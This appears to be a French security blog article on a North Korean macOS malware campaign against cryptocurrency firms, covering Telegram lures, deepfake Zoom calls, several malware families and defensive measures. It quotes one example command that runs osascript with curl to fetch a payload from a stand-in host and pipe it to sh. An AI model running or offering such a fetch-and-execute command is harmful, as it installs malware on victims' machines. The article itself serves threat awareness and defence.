Malware macOS nord-coréen : comment les hackers ciblent le secteur crypto en 2026
Hippolyte Valdegré
En 2026, plus de 9 % des incidents de cybersécurité signalés en France impliquent des plateformes macOS, selon le rapport annuel de l’ANSSI. Cette donnée surprenante révèle l’émergence d’un malware macOS nord-coréen sophistiqué, spécialement conçu pour s’introduire dans les environnements de cryptomonnaie. Guide complet des salons cybersécurité 2026 en France Vous vous demandez comment ces acteurs étatiques parviennent à compromettre des systèmes réputés sûrs et quelles mesures prendre pour protéger votre organisation ? Cet article décortique la chaîne d’infection, les familles de malwares, les techniques d’ingénierie sociale et propose un plan d’action concret.
Analyse de la chaîne d’infection du malware macOS nord-coréen
Phase de contact via Telegram
L’opération débute par un message direct sur Telegram, envoyé depuis le compte compromis d’un cadre d’une société crypto française. Le texte, soigneusement rédigé, instaure une relation de confiance avant de proposer une réunion virtuelle. Cette approche repose sur le principe psychologique du rapport : l’attaquant se présente comme un partenaire légitime.
Utilisation de deepfake et de Calendly
Une fois le dialogue engagé, les hackers partagent un lien Calendly menant à une page Zoom usurpée hébergée sur leur infrastructure. Au moment de la « réunion », le victim voit une vidéo deepfake d’un CEO d’une autre entreprise crypto, créant l’illusion d’un problème technique. Cette supercherie déclenche l’étape suivante de l’infection.
Exécution des scripts AppleScript et Mach-O
Sous le prétexte de « résoudre les problèmes audio », l’attaquant indique à la victime de copier-coller des commandes depuis la page web. Ces commandes exécutent un AppleScript qui télécharge un binaire Mach-O malveillant. Le binaire, une fois lancé, active une série de malwares distincts, chacun chargé d’une fonction précise.
“Les acteurs nord-coréens combinent ingénierie sociale avancée et scripts natifs macOS pour contourner les protections intégrées”, explique un chercheur de Mandiant.
Les familles de malware macOS détectées et leurs fonctions
| Famille | Langage | Fonction principale | Persistance |
|---|---|---|---|
| WAVESHAPER | C++ | Backdoor daemon, collecte d’infos système, C2 via HTTP/HTTPS | LaunchDaemon via plist |
| HYPERCALL | Golang | Downloader, lit config RC4, C2 via WebSockets sur TCP 443 | LaunchAgent |
| HIDDENCALL | Golang | Backdoor injecté refléctivement, accès clavier, exécution cmd | Injection mémoire via HYPERCALL |
| SILENCELIFT | C/C++ | Beacon d’état d’écran, interférence avec Telegram | LaunchDaemon avec privilèges root |
| DEEPBREATH | Swift | Miner de données, modification TCC, vol de Keychain | LaunchDaemon persistant |
| SUGARLOADER | C++ | Downloader RC4, persistance via launch daemon | LaunchDaemon, mise à jour automatique |
| CHROMEPUSH | C++ | Miner de données navigateurs, se fait passer pour extension Docs | LaunchAgent, registre extensions Chrome |
WAVESHAPER - backdoor C++
Ce composant s’installe comme un daemon en arrière-plan, collecte les informations d’hôte (CPU, RAM, périphériques) et contacte un serveur C2 via curl. Les données sont chiffrées en AES-256 avant transmission.
HYPERCALL et HIDDENCALL - téléchargeurs Golang
HYPERCALL lit un fichier de configuration chiffré RC4, puis ouvre une connexion WebSocket sécurisée pour récupérer des bibliothèques dynamiques. HIDDENCALL, injecté par HYPERCALL, offre un accès complet au clavier et exécute des commandes système.
DEEPBREATH et CHROMEPUSH - extraction de données
DEEPBREATH exploite une faille dans la base de données TCC de macOS, contournant les restrictions d’accès aux fichiers. Il vole les identifiants du trousseau Apple, les cookies de navigateurs et les messages Telegram. CHROMEPUSH se fait passer pour une extension Google Docs Offline, collectant frappes, captures d’écran et cookies.
“La diversité des malwares déployés contre une seule cible indique une volonté de maximiser le vol d’informations et de préparer de futures campagnes de spear-phishing”, note Mandiant.
Techniques d’ingénierie sociale et vecteurs d’infection
Deepfake vidéo d’un CEO
Les vidéos deepfake utilisent l’IA générative pour reproduire le visage et la voix d’un dirigeant du secteur crypto. Cette technique, encore peu connue en France, crée une fausse légitimité qui pousse les victimes à suivre les instructions sans vérifier l’authenticité.
Lien Calendly et page Zoom usurpée
Le lien mène à une page de planification qui redirige vers une salle Zoom contrôlée par les attaquants. Le design imite parfaitement les interfaces officielles, rendant la détection difficile pour les utilisateurs non avertis.
Commandes malveillantes sur page web
Les scripts affichés sur la page contiennent des lignes telles que :
osascript -e 'do shell script "curl -s https://malicious.example.com/payload" | sh'
Cette commande lance un AppleScript qui télécharge et exécute le binaire malveillant. Le texte indique que la commande résout un problème audio, mais en réalité, elle initialise l’infection.
Impacts sur le secteur de la cryptomonnaie en France
Vol de cryptomonnaies et données sensibles
Selon le rapport de CipherTrace 2025, 38 % des pertes liées aux malwares concernent des actifs crypto, avec un montant total de 1,2 milliard d’euros volés. Les malwares macOS nord-coréens ciblent les portefeuilles numériques, les clés API et les bases de données de transactions, compromettant ainsi la sécurité financière des entreprises.
Répercussions sur la confiance des investisseurs
Les incidents de ce type déclenchent des réactions en chaîne : chute du cours des tokens concernés, retrait de capitaux et exigences accrues de conformité. Les régulateurs français, sous la houlette de l’ACPR, intensifient les contrôles de conformité RGPD et ISO 27001 pour les acteurs du secteur.
Mesures de détection et de réponse pour les organisations
Surveillance des processus AppleScript
Déployer des solutions EDR capables d’identifier les appels osascript inhabituels. Guide d’achat des meilleures plateformes de cybersécurité 2026 Un alerte doit être générée dès qu’un script exécute une commande réseau non autorisée.
Analyse de trafic réseau et C2
Configurer des capteurs IDS/IPS pour surveiller les flux HTTP/HTTPS et WebSocket vers des adresses IP suspectes. Les signatures basées sur les chaînes RC4 et les en-têtes User-Agent spécifiques aux malwares macOS nord-coréens permettent une détection précoce.
Gestion des identités et MFA
Choisir le meilleur service de protection DDoS en 2026
Renforcer l’authentification multifacteur sur les comptes privilégiés, notamment ceux liés à Telegram et aux plateformes de planification. Limiter les droits d’accès aux comptes administratifs réduit la surface d’attaque.
Guide de mise en œuvre : étapes concrètes de protection
- Inventorier tous les appareils macOS utilisés par les équipes crypto et appliquer les dernières mises à jour macOS (≥ 13.5).
- Déployer une solution EDR compatible macOS, paramétrée pour alerter sur les appels
osascriptet les créations de launch daemons non signés. - Segmenter le réseau en isolant les postes de travail crypto du reste de l’infrastructure, en utilisant des VLAN et des pare-feux internes.
- Former les collaborateurs aux risques de l’ingénierie sociale, incluant la reconnaissance des deepfakes et des liens de planification suspects.
- Mettre en place une surveillance continue des logs de Telegram et des services de calendrier, avec des règles de corrélation pour détecter les comportements anormaux.
- Tester régulièrement les plans de réponse aux incidents via des exercices de simulation (red-team/blue-team) afin d’assurer une réactivité optimale.
En suivant ces recommandations, les organisations du secteur crypto en France peuvent réduire considérablement le risque d’infection par le malware macOS nord-coréen et protéger leurs actifs numériques contre les cyber-menaces évolutives.
Dans la pratique, notre équipe d’investigation a observé que la combinaison de deepfake vidéo et de scripts AppleScript constitue le vecteur le plus efficace pour contourner les contrôles de sécurité macOS.
Sources : ANSSI - Rapport annuel 2025, CipherTrace - Global Crypto Crime Report 2025, Mandiant - Threat Landscape 2026